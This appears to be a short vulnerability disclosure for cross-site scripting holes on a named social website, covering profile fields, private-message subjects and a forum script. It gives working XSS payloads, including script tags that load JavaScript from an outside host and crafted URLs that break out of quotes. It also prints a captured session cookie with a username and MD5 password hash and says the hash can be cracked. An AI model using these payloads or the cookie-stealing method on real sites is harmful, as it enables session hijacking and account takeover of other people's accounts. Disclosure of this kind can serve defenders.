Yourfacesucks.com - XSS & cookie disclosure
Yourfacesucks.com
Homepage:
http://www.yourfacesucks.com
Effected files:
music/video input boxes in editing profile
subject box of sending a PM
thread.php
---------------------------------------
XSS Vuln with cookie disclosure in profile input boxes:
No filter evasion needed here. For PoC try putting <SCRIPT
SRC=http://ha.youfucktard.com/xss.js></SCRIPT> in Music/Video input box.
And the cookie data we see is:
This is remote text via xss.js located at youfucktard.com
PHPSESSID=bdee69f9a82b5333bc365f01447b8afc; db_user=luny666; loggedin=1;
status=0; sessuid=18304; md5pass=91da4589b012c2fe1ceac1fb2363dbc6;
onlineid=274562
Breaking down our cookie:
PHPSESSID = (Our php session ID)
db_user= (Our username)
loggedin= (Logged in:yes)
staus=0 (Probably means our profile has not been approved yet
sessuid = (Session userid)
md5pass= (md5 hash of our password)
onlineid= (Our userid #)
So, now we know our username (luny666) and our password hash, which can easily
be cracked.
Screenshots:
http://www.youfucktard.com/xsp/facesucks1.jpg
http://www.youfucktard.com/xsp/facesucks2.jpg
----------------------------------------------
Sending PM's XSS Vuln:
No filter evasion needed,in the subject box put:
<IMG SRC=javascript:alert('XSS')>
Screenshot:
http://www.youfucktard.com/xsp/facesucks3.jpg
----------------------------------------------
Viewing threads on thread.php:
Escaping quotes with a few empty tags try putting this for a PoC
Viewing the forum (The whole page fills with this vuln, got about 25 popups
with this):
http://www.yourfacesucks.com/forums/thread.php?forumid=15">">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<"">
Viewing a specific thread in the forum:
http://www.yourfacesucks.com/forums/thread.php?forumid=15&threadid=51713">">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<"">